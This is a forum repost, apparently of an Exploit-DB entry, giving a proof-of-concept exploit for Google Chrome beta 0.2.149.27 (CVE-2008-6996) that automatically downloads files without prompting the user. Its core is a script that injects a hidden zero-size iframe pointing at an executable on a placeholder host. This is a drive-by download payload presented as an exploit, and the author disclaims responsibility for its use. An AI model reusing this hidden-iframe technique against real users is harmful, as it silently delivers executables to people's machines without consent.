Exploit Google Chrome 0.2.149.27 - Automatic File Download

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6355
Проверка EDB
  1. Пройдено
Автор
NEREX
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2008-6996
Дата публикации
2008-09-03
Код:
***************************************************************************
 Author: nerex
 E-mail: nerex[at]live[dot]com

 Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
 downloaded to the user's computer without any user prompt.

 This proof-of-concept was created for educational purposes only.
 Use the code it at your own risk.
 The author will not be responsible for any damages.

 Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

# milw0rm.com [2008-09-03]
 
Источник
www.exploit-db.com

Похожие темы